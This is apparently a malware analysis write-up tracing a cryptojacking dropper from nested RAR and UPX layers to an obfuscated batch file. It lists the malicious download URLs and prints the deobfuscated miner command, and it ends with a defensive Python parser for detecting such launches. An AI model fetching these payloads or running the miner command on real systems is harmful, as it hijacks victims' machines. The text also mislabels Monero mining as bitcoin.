We begin by extracting the main executable, which is a self-extracting RAR archive. The file extracted is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception). The file extracted from the second archive is also named WINDOWS.exe and is UPX packed. A quick unpacking of this file reveals the final launcher and its embedded AUTOIT3 script. At the time of this analysis the only file hosted on the domain was 1.bat; the other files were non-existent.

Once running, WINDOWS.exe connects to iplogger.com. If a connection cannot be made, the program exits. This is most likely an anti-analysis trick, which is easily bypassed by setting up rules to pass traffic to the domain or simply responding with what the malware is looking for from the site. Once connectivity is confirmed, WINDOWS.exe connects to the following .RU domain and downloads additional files:

http://porntovirt.ru/075/Security.exe
http://porntovirt.ru/075/system.exe
http://porntovirt.ru/075/1.bat

Performing a directory traversal back to the main page we are greeted with the following (blurred for article):

Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):


Again, clicking the button brings us to the final location which is a redirection to a Google drive file that no longer exists. This could be remnants of a past attack hosting a malicious file.


Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.

Deobfuscating this VERY long script essentially boils down to the following command:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

This launches two instances of the mining software (the script repeats the command), each connecting to the MINERGATE bitcoin mining pool. We can see in red the USERID of the individual to whom the mined bitcoin will be distributed: lemoh4uk.sagmail.com.
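As an added example (not part of the original write-up), the following Python parses the deobfuscated mining command as it would appear in a process-creation log, pulls out the pool host, port and user id, and counts how many instances were launched. The log lines are constructed here from the command above; the flag handling covers only the flags that command uses.

```python
import shlex
from urllib.parse import urlparse

# Constructed process-creation log lines modelled on the deobfuscated command
# above; the miner line is repeated because the batch file launches it twice.
MINER_CMD = ("C:\\ProgramData\\System32\\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 "
             "--donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k")
SAMPLE_LOG = [MINER_CMD, MINER_CMD, "C:\\Windows\\System32\\notepad.exe C:\\Users\\user\\notes.txt"]


def parse_miner_cmdline(cmdline):
    """Return pool/user details for a stratum miner command line, or None if it is not one."""
    tokens = shlex.split(cmdline, posix=False)  # non-posix keeps Windows backslashes intact
    if not tokens:
        return None
    info = {"exe": tokens[0], "pool": None, "host": None, "port": None, "user": None,
            "password": None, "threads": None, "donate_level": None, "keepalive": False}
    i = 1
    while i < len(tokens):
        tok, nxt = tokens[i], tokens[i + 1] if i + 1 < len(tokens) else None
        if tok in ("-o", "-u", "-p", "-t") and nxt is not None:
            key = {"-o": "pool", "-u": "user", "-p": "password", "-t": "threads"}[tok]
            info[key] = int(nxt) if tok == "-t" and nxt.isdigit() else nxt
            i += 1  # consume the flag's value
        elif tok.startswith("--donate-level="):
            info["donate_level"] = tok.split("=", 1)[1]
        elif tok == "-k":
            info["keepalive"] = True
        i += 1
    if not info["pool"]:
        return None
    url = urlparse(info["pool"])
    if not url.scheme.startswith("stratum"):  # only flag stratum pool connections
        return None
    info["host"], info["port"] = url.hostname, url.port
    return info


def find_miner_launches(log_lines):
    """One record per log line that parses as a stratum miner launch."""
    return [rec for rec in map(parse_miner_cmdline, log_lines) if rec]


def launches_per_pool(log_lines):
    """Count launches per (host, port, user): shows the two repeated launches from 1.bat."""
    counts = {}
    for rec in find_miner_launches(log_lines):
        key = (rec["host"], rec["port"], rec["user"])
        counts[key] = counts.get(key, 0) + 1
    return counts
```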

When running at full capacity, the two mining programs will take up significant system resources, as indicated by this graph immediately after infection: